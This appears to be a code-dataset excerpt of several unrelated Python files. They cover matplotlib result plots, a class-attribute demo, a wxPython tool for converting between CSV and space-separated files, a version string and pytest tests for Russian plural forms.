plt.plot(users, new_maes, marker='^', color="IndianRed", label=u"本文相似用户模型", linewidth=1.5)
plt.xlabel(u"相似近邻数", fontsize=10, fontweight='bold', labelpad=1)
plt.ylabel("MAE", fontsize=10, fontweight='bold', labelpad=1)
plt.ylim(0.7, 1)
plt.xlim(8, 52)
plt.legend(loc=0, numpoints=1)
leg = plt.gca().get_legend()
ltext = leg.get_texts()
plt.setp(ltext, fontsize=6, fontweight='bold')
plt.show()
def nscf_epoch_curve():
x = np.linspace(1, 100, 100)
train_logloss = [13.9749, ]
test_logloss = [15.7243, ]
# plt.figure(figsize=(6, 3))
# plt.grid(linestyle="--")
# ax = plt.gca()
# ax.spines['top'].set_visible(False)
# ax.spines['right'].set_visible(False)
#
# plt.plot(x, train_logloss, marker='o', color="SkyBlue", label="Train Data LogLoss", linewidth=1.5)
# plt.plot(x, test_logloss, marker='^', color="IndianRed", label="Test Data LogLoss", linewidth=1.5)
#
# plt.xlabel("Epochs", fontsize=6.5, fontweight='bold', labelpad=-5)
# plt.ylabel("LogLoss", fontsize=6.5, fontweight='bold', labelpad=-5)
#
# plt.legend(loc=0, numpoints=1)
# leg = plt.gca().get_legend()
# ltext = leg.get_texts()
# plt.setp(ltext, fontsize=6, fontweight='bold')
#
# plt.show()
def main():
# nscf_learning_curves()
# nscf_auc_logloss()
# nscf_n_auc_logloss()
# nscf_rmse()
# nscf_model_auc_logloss()
# nscf_d_auc_logloss()
# nssd_logloss()
# nssd_m_aud_logloss()
# plot_mae()
# nscf_epoch_curve()
nscf_learning_curves()
if __name__ == "__main__":
main()
# import random
# for i in range(20):
# print random.randint(0, 9), random.randint(0, 9)
|
18,378 | 3cdded67166462a2c922eaa644b3eca5b965321d | class MyClass(object):
class_var = 1
common_var = 10
def __init__(self, i_var, *args, **kwargs):
self.i_var = i_var
if len(args) > 0:
print 'args: ', args.__getitem__(len(args)-1)
if (kwargs.get('common_var') != None):
self.common_var = kwargs.get('common_var')
foo = MyClass(2, 120)
bar = MyClass(3, common_var = 112)
print foo.class_var, foo.i_var
print bar.class_var, bar.i_var
print MyClass.class_var
print MyClass.__dict__
try:
print foo.__class__.__dict__['common_var']
except KeyError:
print '-'
print foo.__dict__
#print foo.__dict__.__getattribute__('__doc__')
print foo.common_var
print bar.common_var
print '&&&'
print foo.common_var
setattr(MyClass, 'common_var', 500)
print foo.common_var
print '\n', MyClass.class_var
o = MyClass(100)
o.__class__.class_var
print o.class_var, MyClass.class_var
class BasePoint:
'''
# Instance object's attributes:
point = (0, 0)
'''
def __init__(self, point):
self.point = point
def distance_to_origin(self):
print 'Basepoint empty distance...', self.point
class CartezianPoint(BasePoint):
def distance_to_origin(self):
print 'Evaluate distance of cartezian point...', self.point
# here evaluate distance for cortezian and return it
class ManhettenPoint(BasePoint):
def distance_to_origin(self):
print 'Evaluate distance of manhatten point...', self.point
# evaluate of mathetten'sand return it
cp = (3, 4)
mp = (10, 20)
cp_object = CartezianPoint(cp)
mp_object = ManhettenPoint(mp)
print cp_object, mp_object
cp_object.distance_to_origin()
mp_object.distance_to_origin()
class NewtonPoint(ManhettenPoint):
pass
np_object = NewtonPoint((100, 200));
np_object.distance_to_origin()
print '\n======================\n'
class Service():
data = []
def __init__(self, other_data):
self.other_data = other_data
def __str__(self):
return 'Service instance: {}'.format(self.other_data)
s1 = Service(['a', 'b'])
s2 = Service(['c', 'd'])
s1.data = [1]
s2.data = [2]
print Service.data
print s1.data
print s2.data
|
18,379 | 68fd68601a8d643002a08284f6734ad81b0d2765 | import wx
import os #needed to join paths in open/save
import threading
import copy #deep copy for filter
class mainwindow(wx.Frame):
def __init__(self, parent, title):
self.input = ['', '', '', '', '', ''] #Save user entered values
self.dirname = ''
self.filename = ''
#Creating the window, setting it blue, and adding a text box to it
wx.Frame.__init__(self, parent, title = title, size =(1000, 800))
self.SetBackgroundColour((150, 200, 255)) #light blue
self.logger = wx.TextCtrl(self, size=(300, 150),style=wx.TE_MULTILINE|\
wx.TE_RICH)
self.CreateStatusBar()
self.Bind(wx.EVT_CLOSE, self.OnExit) #bind x button
self.is_header = False #Input has header if True
self.copy_header = False #copy header to output
self.is_csv = False #Input is csv file
self.want_csv = False #output should be csv file
self.smart_check = False #control type of output based on input
#Setting up the "File" menu option
filemenu = wx.Menu()
menuOpen = filemenu.Append(wx.ID_OPEN, "&Open", \
"Open a Text File of Points to Interpolate")
menuSave = filemenu.Append(wx.ID_SAVE, \
"&Save", "Select a Text File for Output")
menuAbout = filemenu.Append(wx.ID_ABOUT, "&About", \
"Information About the Program")
filemenu.AppendSeparator()
menuExit = filemenu.Append(wx.ID_EXIT,"&Exit","Terminate the Program")
self.Bind(wx.EVT_MENU, self.OnOpen, menuOpen)
self.Bind(wx.EVT_MENU, self.OnSave, menuSave)
self.Bind(wx.EVT_MENU, self.OnAbout, menuAbout)
self.Bind(wx.EVT_MENU, self.OnExit, menuExit)
#Setting up the "Help" menu option
helpmenu = wx.Menu()
self.menuHelp = helpmenu.Append(wx.ID_HELP, "&Help", \
"Help on Using the Program")
self.Bind(wx.EVT_MENU, self.OnHelp, self.menuHelp)
#Creating File MenuBar
menubar = wx.MenuBar()
menubar.Append(filemenu, "&File")
menubar.Append(helpmenu, "&Help")
self.SetMenuBar(menubar)
#Create Sizers
mainSizer = wx.BoxSizer(wx.VERTICAL)
grid = wx.GridBagSizer(hgap=7, vgap=3)
hSizer = wx.BoxSizer(wx.HORIZONTAL)
#Input File Box
self.input_text = wx.StaticText(self, label = "Input File Name:")
self.input_box = wx.TextCtrl(self, value="", \
size = (200, -1))
grid.Add(self.input_text, pos = (0, 0))
grid.Add(self.input_box, pos = (1, 0))
self.Bind(wx.EVT_TEXT, lambda x: self.EvtText(x, 0), \
self.input_box)
self.make_bold(self.input_text)
self.make_bold(self.input_box)
#Input Browse Button
self.browse_button_input = wx.Button(self, label = "Browse..")
self.Bind(wx.EVT_BUTTON, self.OnOpen, self.browse_button_input)
self.make_bold(self.browse_button_input)
grid.Add(self.browse_button_input, pos = (2, 0))
#Output File Box
self.output_text = wx.StaticText(self, label = "Output File Name:")
self.output_box = wx.TextCtrl(self, value="", \
size = (200, -1))
grid.Add(self.output_text, pos = (0, 1))
grid.Add(self.output_box, pos = (1, 1))
self.Bind(wx.EVT_TEXT, lambda x: self.EvtText(x, 1), \
self.output_box)
self.make_bold(self.output_text)
self.make_bold(self.output_box)
#Browse Button Output
self.browse_button_out = wx.Button(self, label = "Browse..")
self.Bind(wx.EVT_BUTTON, self.OnSave, self.browse_button_out)
self.make_bold(self.browse_button_out)
grid.Add(self.browse_button_out, pos = (2, 1))
#Number of Lines
self.num_lines_prompt = wx.StaticText(\
self,label="Number of lines: ")
self.num_lines = wx.TextCtrl(self, value="", \
size = (200, -1))
grid.Add(self.num_lines_prompt, pos = (3, 0))
grid.Add(self.num_lines, pos = (4, 0))
self.Bind(wx.EVT_TEXT, lambda x: self.EvtText(x, 4), self.num_lines)
self.make_bold(self.num_lines)
self.make_bold(self.num_lines_prompt)
#Filter
self.filter_prompt = wx.StaticText(\
self,label="Filter: ")
self.filter = wx.TextCtrl(self, value="", \
size = (200, -1))
grid.Add(self.filter_prompt, pos = (3, 1))
grid.Add(self.filter, pos = (4, 1))
self.Bind(wx.EVT_TEXT, lambda x: self.EvtText(x, 5), self.filter)
self.make_bold(self.filter_prompt)
self.make_bold(self.filter)
#Input format
self.in_format_prompt = wx.StaticText(self,label="Input File Format: ")
self.in_format = wx.TextCtrl(self, value="", \
size = (200, -1))
grid.Add(self.in_format_prompt, pos = (5, 0))
grid.Add(self.in_format, pos = (6, 0))
self.Bind(wx.EVT_TEXT, lambda x: self.EvtText(x, 2), self.in_format)
self.make_bold(self.in_format_prompt)
#Output Format
self.out_format_prompt= wx.StaticText(self,label="Output File Format: ")
self.out_format = wx.TextCtrl(self, value="", \
size = (200, -1))
grid.Add(self.out_format_prompt, pos = (5, 1))
grid.Add(self.out_format, pos = (6, 1))
self.Bind(wx.EVT_TEXT, lambda x: self.EvtText(x, 3), self.out_format)
self.make_bold(self.out_format_prompt)
#Has Header Checkbox
self.header_check = wx.CheckBox(self, style=wx.CHK_2STATE, \
name = "Has Header")
grid.Add(self.header_check, pos = (7, 1))
self.Bind(wx.EVT_CHECKBOX, self.OnCheckHead, self.header_check)
self.header_check_lbl = wx.StaticText(self, label =\
(" "\
+ " Has Header"))
grid.Add(self.header_check_lbl, pos=(7, 0))
self.make_bold(self.header_check_lbl)
#Copy Header Checkbox
self.header_copy = wx.CheckBox(self, style=wx.CHK_2STATE, \
name = "Copy Header")
grid.Add(self.header_copy, pos = (8, 1))
self.Bind(wx.EVT_CHECKBOX, self.OnCheckCopy, self.header_copy)
self.header_copy_lbl = wx.StaticText(self, label =\
(" " +\
" Copy Header"))
grid.Add(self.header_copy_lbl, pos=(8, 0))
self.make_bold(self.header_copy_lbl)
self.header_copy.Enable(False)
#Input is CSV Checkbox
self.in_is_csv = wx.CheckBox(self, style=wx.CHK_2STATE, \
name = "Input File CSV")
grid.Add(self.in_is_csv, pos = (9, 1))
self.Bind(wx.EVT_CHECKBOX, self.OnCheckCSV, self.in_is_csv)
self.in_is_csv_lbl = wx.StaticText(self, label =\
(" " +\
" Input is CSV File"))
grid.Add(self.in_is_csv_lbl, pos=(9, 0))
self.make_bold(self.in_is_csv_lbl)
#Output is CSV Checkbox
self.out_is_csv = wx.CheckBox(self, style=wx.CHK_2STATE, \
name = "Output File CSV")
grid.Add(self.out_is_csv, pos = (10, 1))
self.Bind(wx.EVT_CHECKBOX, self.OnCheckOut, self.out_is_csv)
self.out_is_csv_lbl = wx.StaticText(self, label =\
(" " +\
" Output is CSV File"))
grid.Add(self.out_is_csv_lbl, pos=(10, 0))
self.make_bold(self.out_is_csv_lbl)
if self.smart_check:
self.out_is_csv.Enable(False)
#Smart Checkbox
create_smartcheck = filemenu.Append(wx.ID_ANY, "Smart&Check", "SmartCheck", wx.ITEM_CHECK)
self.Bind(wx.EVT_MENU, self.OnSmartCheck, create_smartcheck)
#Convert Button
self.convert_button = wx.Button(self, label="Convert")
self.Bind(wx.EVT_BUTTON, self.OnClick, self.convert_button)
self.make_bold(self.convert_button)
#Clear Button
self.clear_button = wx.Button(self, label = "Clear")
self.Bind(wx.EVT_BUTTON, self.Clear, self.clear_button)
self.make_bold(self.clear_button)
#Setup sizers and place them
hSizer.AddSpacer(10)
hSizer.Add(grid, 0, wx.EXPAND, 10)
hSizer.AddSpacer(10)
hSizer.Add(self.logger, 1, wx.EXPAND)
mainSizer.AddSpacer(10)
mainSizer.Add(hSizer, 1,wx.EXPAND)
mainSizer.AddSpacer(10)
mainSizer.Add(self.convert_button, 0, wx.EXPAND | wx.CENTER)
mainSizer.AddSpacer(5)
buttonSizer = wx.BoxSizer(wx.HORIZONTAL)
buttonSizer.Add(self.clear_button, 1, wx.LEFT)
mainSizer.Add(buttonSizer, 0)
self.SetSizerAndFit(mainSizer)
self.Centre()
def OnAbout(self, e): #Basic info about software
'''Displays a pupup box that gives information about this software'''
dlg = wx.MessageDialog(self, "Convert Text File Software " + \
"\n\nThis Graphical-" +\
"User-Interface for converting between " +\
"Space separated and comma separated text files"\
+ " was created by" +\
" Cameron Buttazzoni for research " + \
"purposes at the Fires Management " +\
"System Laboratory in the Faculty of Forestry"+\
" at the University of Toronto\n\n" +\
"THIS SOFTWARE IS NOT VALIDATED OR CERTIFIED" +\
" FOR OPERATIONAL USE"\
+ "\nCopyright: Cameron Buttazzoni\n\n", \
"About Convert Text Files Software", wx.OK)
dlg.ShowModal()
dlg.Destroy()
def OnExit(self, e): #exit
'''Exit the software'''
self.Close(True)
raise SystemExit
def OnSave(self, e): #Same functionality as browse output file
'''Select an output file'''
dlg = wx.FileDialog(self, "Choose a file", self.dirname, \
"", "*.*", wx.OPEN)
if dlg.ShowModal() == wx.ID_OK:
self.filename = dlg.GetFilename()
self.dirname = dlg.GetDirectory()
self.input[1] = os.path.join(self.dirname, self.filename)
self.output_box.SetValue(os.path.join(self.dirname, self.filename))
dlg.Destroy()
def OnOpen(self, e): #same functionality as browse input file
'''Open an input file'''
dlg = wx.FileDialog(self, "Choose a file", self.dirname, \
"", "*.*", wx.OPEN)
if dlg.ShowModal() == wx.ID_OK:
self.filename = dlg.GetFilename()
self.dirname = dlg.GetDirectory()
self.input[0] = os.path.join(self.dirname, self.filename)
self.input_box.SetValue(os.path.join(self.dirname, self.filename))
dlg.Destroy()
def OnHelp(self, e): #brief tutorial on commands + how to use
'''Opens a box displaying this on help'''
help_text = '''Input file should be a space seperated or csv file\n
For input format, leave it blank to copy all of the values from the input file\n
Instead, you can enter comma or space seperated numbers to choose from specific
input columns that you want to include.\nFor output format, the format is
the same, but this chooses the order the inputs will be placed in the output
file. Leave this field blank to copy all inputs.\n Numbers not entered will
be replaced by NULL for space seperated output files, and an empty string
for CVS output files.\n WARNING: Reordering the output DOES NOT reorder the
header if you select to copy it.\nSmartCheck Automatically converts to a
space seperated file if the input is CSV, and vice versa.\n
Number of lines copies up to that many lines (not counting the header if copied
\nTo use filter, enter the values as column number (starting from 1)::string\n
* can be included so to filter such that everything else must be in any string.
-- can be included at the start of a string to copy all but those ones.
% Can be included in a string to represent any character (even none)\n
Separate additional filters with a comma without a space, example:\n
4::196*,3::--Type1,1::1%%%
This would filter everything such that the 4th column must include 196
somewhere. the 3rd column cannot be Type1 and the 1st column must be a number
in the one thousands.'''
help_dlg = wx.MessageDialog(self, help_text, "File Conversion" +\
" Software Help", wx.OK)
help_dlg.ShowModal()
help_dlg.Destroy()
def EvtText(self, e, num):
'''Entering text sets input to new entered value'''
try:
value = e.GetString().encode('ascii', 'ignore')
except AttributeError:
pass
if num == 2: #input format
if value == '':
self.input[num] = ''
elif len(value.split(',')) != 1:
temp_list = value.split(',')
for x in range(len(temp_list)):
try:
if temp_list[x] != '' and temp_list[x] != ' ':
temp_list[x] = int(temp_list[x])
except (ValueError, IndexError):
self.logger.AppendText("\nInvalid Format\n")
self.input[num] = temp_list
else:
temp_list = value.split()
for x in range(len(temp_list)):
try:
if temp_list[x] != '' and temp_list[x] != ' ':
temp_list[x] = int(temp_list[x])
except ValueError:
self.logger.AppendText("\nInvalid Format\n")
self.input[num] = temp_list
elif num == 3: #output format
if value == '':
self.input[num] = ''
elif len(value.split(',')) != 1:
temp_list = value.split(',')
for x in range(len(temp_list)):
try:
if temp_list[x] != '' and temp_list[x] != ' ':
temp_list[x] = int(temp_list[x])
except ValueError:
self.logger.AppendText("\nInvalid Format\n")
self.input[num] = temp_list
else:
temp_list = value.split()
for x in range(len(temp_list)):
try:
if temp_list[x] != '' and temp_list[x] != ' ':
temp_list[x] = int(temp_list[x])
except ValueError:
self.logger.AppendText("\nInvalid Format\n")
self.input[num] = temp_list
elif num == 5: #Filter
temp_list = value.split(',')
for x in range(len(temp_list)):
try:
temp_list[x] = temp_list[x].split('::')
temp_list[x][0] = int(temp_list[x][0])
if type(temp_list[x][1]) != str:
raise ValueError
except (ValueError, IndexError, TypeError):
pass
self.input[5] = temp_list
else:
self.input[num] = value
def Clear(self, e): #clears logger and all entered values
self.logger.Clear()
self.input_box.Clear()
self.output_box.Clear()
self.out_format.Clear()
self.in_format.Clear()
self.filter.Clear()
self.num_lines.Clear()
for x in range(len(self.input)):
self.input[x] = ''
def OnClick(self, e):
'''Convert'''
self.disable_buttons()
if self.input[2] == '': #Copy everything
copy_all_thread = threading.Thread(target = self.copy_all)
copy_all_thread.setDaemon(True)
copy_all_thread.start()
else: #Copy some
copy_select_thread = threading.Thread(target = self.copy_select)
copy_select_thread.setDaemon(True)
copy_select_thread.start()
def copy_all(self):
#Copy Everything Over
try:
in_file = open(self.input[0], 'r')
except IOError:
self.logger.AppendText("\nInvalid Input File\n\n")
self.enable_buttons()
return
try:
out_file = open(self.input[1], 'w')
except IOError:
self.logger.AppendText("\nInvalid Output File\n\n")
self.enable_buttons()
return
temp = ''
if self.is_header:
temp = in_file.readline()
temp = in_file.readline()
if self.is_csv:
find_length_in = len(temp.split(','))
else:
find_length_in = len(temp.split())
try:
if max(self.input[2]) > find_length_in:
in_file.close()
out_file.close()
self.logger.AppendText("\nInput Format Value Too Large\n\n")
self.enable_buttons()
return
except ValueError:
pass
in_file.seek(0)
self.logger.AppendText("\nConverting...\n\n")
if self.is_header: #Copy header
temp = in_file.readline()
if temp[-1] == '\n':
temp = temp[:-1]
if self.copy_header:
if self.is_csv:
temp2 = temp.split(',')
for x in range(len(temp2)):
if not self.want_csv:
if temp2[x] != '':
if x != len(temp2) - 1:
out_file.write(temp2[x] + " ")
else:
out_file.write(temp2[x])
else:
if x != len(temp2) - 1:
out_file.write("NULL ")
else:
out_file.write("NULL")
else:
if x != len(temp2) - 1:
out_file.write(temp2[x] + ",")
else:
out_file.write(temp2[x])
out_file.write('\n')
else:
temp2 = temp.split()
for x in range(len(temp2)):
if self.want_csv:
if x != len(temp2) - 1:
out_file.write(temp2[x] + ",")
else:
out_file.write(temp2[x])
else:
if temp2[x] != '':
if x != len(temp2) - 1:
out_file.write(temp2[x] + " ")
else:
out_file.write(temp2[x])
else:
if x != len(temp2) - 1:
out_file.write("NULL ")
else:
out_file.write("NULL")
out_file.write('\n')
temp = in_file.readline()
if self.input[3] == '': #if no output changes
count = 1
while temp != '':
if temp[-1] == '\n':
temp = temp[:-1]
if self.is_csv:
temp2 = temp.split(',')
check = self.filter_line(temp2)
if check == -1:
self.logger.AppendText("Invalid Filter Inputted")
self.enable_buttons()
return
elif check == 0:
temp = in_file.readline()
continue
for x in range(len(temp2)):
if not self.want_csv:
if temp2[x] != '':
if x != len(temp2) - 1:
out_file.write(temp2[x] + " ")
else:
out_file.write(temp2[x])
else:
if x != len(temp2) - 1:
out_file.write("NULL ")
else:
out_file.write("NULL")
else:
if x != len(temp2) - 1:
out_file.write(temp2[x] + ',')
else:
out_file.write(temp2[x])
out_file.write('\n')
else:
temp2 = temp.split()
check = self.filter_line(temp2)
if check == -1:
self.logger.AppendText("Invalid Filter Inputted")
self.enable_buttons()
return
elif check == 0:
temp = in_file.readline()
continue
for x in range(len(temp2)):
if self.want_csv:
if x != len(temp2) - 1:
out_file.write(temp2[x] + ",")
else:
out_file.write(temp2[x])
else:
if temp2[x] != '':
if x != len(temp2) - 1:
out_file.write(temp2[x] + " ")
else:
out_file.write(temp2[x])
else:
if x != len(temp2) - 1:
out_file.write("NULL ")
else:
out_file.write("NULL")
out_file.write('\n')
temp = in_file.readline()
try:
if self.input[4] != '' and count >= int(self.input[4]):
break
count += 1
except ValueError:
self.logger.AppendText("\nInvalid number of runs\n\n")
return
in_file.close()
out_file.close()
self.enable_buttons()
self.logger.AppendText("\nFinished Conversion\n\n")
return
count = 1
while temp != '': #if output formatting
for x in range(len(self.input[3])):
if type(self.input[3][x]) != int:
self.logger.AppendText("\nInvalid Output Format\n\n")
self.enable_buttons()
return
if temp[-1] == '\n':
temp = temp[:-1]
if self.is_csv:
temp2 = temp.split(',')
check = self.filter_line(temp2)
if check == -1:
self.logger.AppendText("Invalid Filter Inputted")
self.enable_buttons()
return
elif check == 0:
temp = in_file.readline()
continue
new_line = ["NULL"] * max(self.input[3])
for x in range(len(temp2)):
try:
new_line[self.input[3][x] - 1] = temp2[x] #first spot is 1
except IndexError:
pass
for x in range(len(new_line)):
if not self.want_csv:
if new_line[x] != '':
if x != len(new_line) - 1:
out_file.write(new_line[x] + " ")
else:
out_file.write(new_line[x])
else:
if x != len(new_line) - 1:
out_file.write("NULL ")
else:
out_file.write("NULL")
else:
if x != len(new_line) - 1:
out_file.write(new_line[x] + ",")
else:
out_file.write(new_line[x])
out_file.write('\n')
else:
temp2 = temp.split()
check = self.filter_line(temp2)
if check == -1:
self.logger.AppendText("Invalid Filter Inputted")
self.enable_buttons()
return
elif check == 0:
temp = in_file.readline()
continue
new_line = [""] * max(self.input[3])
for x in range(len(temp2)):
try:
new_line[self.input[3][x] - 1] = temp2[x] #first spot is 1
except IndexError:
pass
for x in range(len(new_line)):
if self.want_csv:
if x != len(new_line) - 1:
out_file.write(new_line[x] + ",")
else:
out_file.write(new_line[x])
else:
if new_line[x] != '':
if x != len(new_line) - 1:
out_file.write(new_line[x] + " ")
else:
out_file.write(new_line[x])
else:
if x != len(new_line) - 1:
out_file.write("NULL ")
else:
out_file.write("NULL")
out_file.write('\n')
temp = in_file.readline()
try:
if self.input[4] != '' and count >= int(self.input[4]):
break
count += 1
except ValueError:
self.logger.AppendText("\nInvalid number of runs\n\n")
return
in_file.close()
out_file.close()
self.enable_buttons()
self.logger.AppendText("\nFinished Conversion\n\n")
return
def copy_select(self):
'''Copy some of input to output file'''
for x in range(len(self.input[2])):
if type(self.input[2][x]) != int and ':' not in self.input[2][x]:
self.logger.AppendText("\nInvalid Input Format\n\n")
self.enable_buttons()
return
try:
in_file = open(self.input[0], 'r')
except IOError:
self.logger.AppendText("\nInvalid Input File\n\n")
self.enable_buttons()
return
try:
out_file = open(self.input[1], 'w')
except IOError:
self.logger.AppendText("\nInvalid Output File\n\n")
self.enable_buttons()
return
temp = ''
if self.is_header:
temp = in_file.readline()
temp = in_file.readline()
if self.is_csv:
find_length_in = len(temp.split(','))
else:
find_length_in = len(temp.split())
try:
if max(self.input[2]) > find_length_in:
in_file.close()
out_file.close()
self.logger.AppendText("\nInput Format Value Too Large\n\n")
self.enable_buttons()
return
except ValueError:
pass
in_file.seek(0)
self.logger.AppendText("\nConverting...\n\n")
if self.is_header: #copy header file
temp = in_file.readline()
if temp[-1] == '\n':
temp = temp[:-1]
if self.copy_header:
if self.is_csv:
temp2 = temp.split(',')
for x in range(len(temp2)):
if not self.want_csv:
if temp2[x] != '':
if x != len(temp2) - 1:
out_file.write(temp2[x] + " ")
else:
out_file.write(temp2[x])
else:
if x != len(temp2) - 1:
out_file.write("NULL ")
else:
out_file.write("NULL")
else:
if x != len(temp2) - 1:
out_file.write(temp2[x] + ",")
else:
out_file.write(temp2[x])
out_file.write('\n')
else:
temp2 = temp.split()
for x in range(len(temp2)):
if self.want_csv:
if x != len(temp2) - 1:
out_file.write(temp2[x] + ",")
else:
out_file.write(temp2[x])
else:
if temp2[x] != '':
if x != len(temp2) - 1:
out_file.write(temp2[x] + " ")
else:
out_file.write(temp2[x])
else:
if x != len(temp2) - 1:
out_file.write("NULL ")
else:
out_file.write("NULL")
out_file.write('\n')
temp = in_file.readline()
#Copy selected ones over
count = 1
if self.input[3] == '': #if no output formatting
while temp != '':
if temp[-1] == '\n':
temp = temp[:-1]
if self.is_csv:
temp2 = temp.split(',')
check = self.filter_line(temp2)
if check == -1:
self.logger.AppendText("Invalid Filter Inputted")
self.enable_buttons()
return
elif check == 0:
temp = in_file.readline()
continue
for x in range(len(self.input[2])):
if not self.want_csv:
if temp2[self.input[2][x] - 1] != '':
if x != len(self.input[2]) - 1:
out_file.write(temp2[self.input[2][x] - 1] + " ")
else:
out_file.write(temp2[self.input[2][x] - 1])
else:
if x != len(self.input[2]) - 1:
out_file.write("NULL ")
else:
out_file.write("NULL")
else:
if x != len(self.input[2]) - 1:
out_file.write(temp2[self.input[2][x] - 1] + ",")
else:
out_file.write(temp2[self.input[2][x] - 1])
out_file.write('\n')
else:
temp2 = temp.split()
check = self.filter_line(temp2)
if check == -1:
self.logger.AppendText("Invalid Filter Inputted")
self.enable_buttons()
return
elif check == 0:
temp = in_file.readline()
continue
for x in range(len(self.input[2])):
if self.want_csv:
if x != len(self.input[2]) - 1:
out_file.write(temp2[self.input[2][x] - 1] + ",")
else:
out_file.write(temp2[self.input[2][x] - 1])
else:
if temp2[self.input[2][x] - 1] != '':
if x != len(self.input[2]) - 1:
out_file.write(temp2[self.input[2][x] - 1] + " ")
else:
out_file.write(temp2[self.input[2][x] - 1])
else:
if x != len(self.input[2]) - 1:
out_file.write("NULL ")
else:
out_file.write("NULL")
out_file.write('\n')
temp = in_file.readline()
try:
if self.input[4] != '' and count >= int(self.input[4]):
break
count += 1
except ValueError:
self.logger.AppendText("\nInvalid number of runs\n\n")
return
in_file.close()
out_file.close()
self.enable_buttons()
self.logger.AppendText("\nFinished Conversion\n\n")
return
while temp != '': #if output formatting
for x in range(len(self.input[3])):
if type(self.input[3][x]) != int:
self.logger.AppendText("\nInvalid Output Format\n\n")
self.enable_buttons()
return
if temp[-1] == '\n':
temp = temp[:-1]
if self.is_csv:
temp2 = temp.split(',')
check = self.filter_line(temp2)
if check == -1:
self.logger.AppendText("Invalid Filter Inputted")
self.enable_buttons()
return
elif check == 0:
temp = in_file.readline()
continue
new_line = ["NULL"] * max(self.input[3])
for x in range(len(temp2)):
try:
new_line[self.input[3][x] - 1] = \
temp2[self.input[2][x] - 1]
#first spot is 1
except IndexError:
try:
new_line.append(temp2[self.input[2][x] - 1])
except IndexError:
pass
for x in range(len(new_line)):
if not self.want_csv:
if new_line[x] != '':
if x != len(new_line) - 1:
out_file.write(new_line[x] + " ")
else:
out_file.write(new_line[x])
else:
if x != len(new_line) - 1:
out_file.write("NULL ")
else:
out_file.write("NULL")
else:
if x != len(new_line) - 1:
out_file.write(new_line[x] + ",")
else:
out_file.write(new_line[x])
out_file.write('\n')
else:
temp2 = temp.split()
check = self.filter_line(temp2)
if check == -1:
self.logger.AppendText("Invalid Filter Inputted")
self.enable_buttons()
return
elif check == 0:
temp = in_file.readline()
continue
new_line = [""] * max(self.input[3])
for x in range(len(temp2)):
try:
new_line[self.input[3][x] - 1] = \
temp2[self.input[2][x] - 1]
#first spot is 1
except IndexError:
try:
new_line.append(temp2[self.input[2][x] - 1])
except IndexError:
pass
for x in range(len(new_line)):
if self.want_csv:
if x != len(new_line) - 1:
out_file.write(new_line[x] + ",")
else:
out_file.write(new_line[x])
else:
if new_line[x] != '':
if x != len(new_line) - 1:
out_file.write(new_line[x] + " ")
else:
out_file.write(new_line[x])
else:
if x != len(new_line) - 1:
out_file.write("NULL ")
else:
out_file.write("NULL")
out_file.write('\n')
temp = in_file.readline()
try:
if self.input[4] != '' and count >= int(self.input[4]):
break
count += 1
except ValueError:
self.logger.AppendText("\nInvalid number of runs\n\n")
return
in_file.close()
out_file.close()
self.enable_buttons()
self.logger.AppendText("\nFinished Conversion\n\n")
return
def filter_line(self, line):
'''Checks if line passes filter'''
if self.input[5]=='' or self.input[5]==[''] or self.input[5] == [['']]:
return 1
for x in range(len(self.input[5])):
temp = copy.deepcopy(self.input[5])
try:
if '*' in temp[x][1] and '--' in temp[x][1]:
temp[x][1] = temp[x][1].translate(None, "*")
temp[x][1] = temp[x][1].translate(None, "--")
if temp[x][1] in line[self.input[5][x][0]-1]:
return 0
elif '*' in temp[x][1]:
temp[x][1] = temp[x][1].translate(None, "*")
if temp[x][1] not in line[self.input[5][x][0]-1]:
return 0
elif '%' in temp[x][1] and '--' in temp[x][1]:
temp[x][1] = temp[x][1].translate(None, "--")
if len(temp[x][1]) == len(line[self.input[5][x][0]-1]):
flag = True
for y in range(len(temp[x][1])):
if temp[x][1][y] != line[self.input[5][x][0]-1][y]\
and temp[x][1][y] != '%':
flag = False
break
if flag:
return 0
elif '%' in temp[x][1]:
if len(temp[x][1]) != len(line[self.input[5][x][0]-1]):
return 0
for y in range(len(temp[x][1])):
if temp[x][1][y] != line[self.input[5][x][0]-1][y]\
and temp[x][1][y] != '%':
return 0
elif '--' == temp[x][1][:2]:
temp[x][1] = temp[x][1].translate(None, "--")
if line[self.input[5][x][0] - 1] == temp[x][1]:
return 0
else:
if line[self.input[5][x][0] - 1] != temp[x][1]:
return 0
except IndexError:
return -1
return 1
def make_bold(self, text):
'''Makes prompts and button text bold'''
temp_font = text.GetFont()
temp_font.SetWeight(wx.BOLD)
text.SetFont(temp_font)
def disable_buttons(self):
'''Prevent User from clicking any buttons'''
self.convert_button.Enable(False)
self.clear_button.Enable(False)
self.browse_button_out.Enable(False)
self.browse_button_input.Enable(False)
def enable_buttons(self):
'''Reenable buttons to be pressed'''
self.convert_button.Enable(True)
self.clear_button.Enable(True)
self.browse_button_out.Enable(True)
self.browse_button_input.Enable(True)
def OnCheckHead(self, e):
if self.is_header == False:
self.is_header = True
else:
self.is_header = False
if self.header_copy.IsEnabled():
self.header_copy.Enable(False)
else:
self.header_copy.Enable(True)
def OnCheckCopy(self, e):
if self.copy_header:
self.copy_header = False
else:
self.copy_header = True
def OnCheckCSV(self, e):
if self.is_csv:
self.is_csv = False
if self.smart_check:
self.want_csv = True
self.out_is_csv.SetValue(True)
else:
self.is_csv = True
if self.smart_check:
self.want_csv = False
self.out_is_csv.SetValue(False)
def OnCheckOut(self, e):
if self.want_csv:
self.want_csv = False
else:
self.want_csv = True
def OnSmartCheck(self, e):
if self.smart_check:
self.smart_check = False
self.out_is_csv.Enable(True)
else:
self.smart_check = True
self.out_is_csv.Enable(False)
#run the GUI
app = wx.App(False)
frame = mainwindow(None, "Fire Interpolation System")
frame.Show()
app.MainLoop()
|
18,380 | ad57751f5c44160e29dc327a37a4c66a13c1a327 | release_version = "0.0.13"
|
18,381 | 195a7371124b995789d3e4d7a938b506ab7f7c15 | from rehearsal.if_AB import if_AB
def test_1():
assert if_AB(1) == '1 bochka'
assert if_AB(101) == '101 bochka'
assert if_AB(301) == '301 bochka'
def test_many():
assert if_AB(10) == '10 bochek'
assert if_AB(1000) == '1000 bochek'
assert if_AB(8) == '8 bochek'
def test_some():
assert if_AB(3) == '3 bochki'
assert if_AB(4) == '4 bochki'
assert if_AB(2) == '2 bochki'
assert if_AB(93) == '93 bochki'
assert if_AB(194) == '194 bochki'
assert if_AB(402) == '402 bochki'
def test_exeption():
assert if_AB(11) == '11 bochek'
assert if_AB(12) == '12 bochek'
assert if_AB(13) == '13 bochek'
assert if_AB(113) == '113 bochek'
assert if_AB(214) == '214 bochek' |
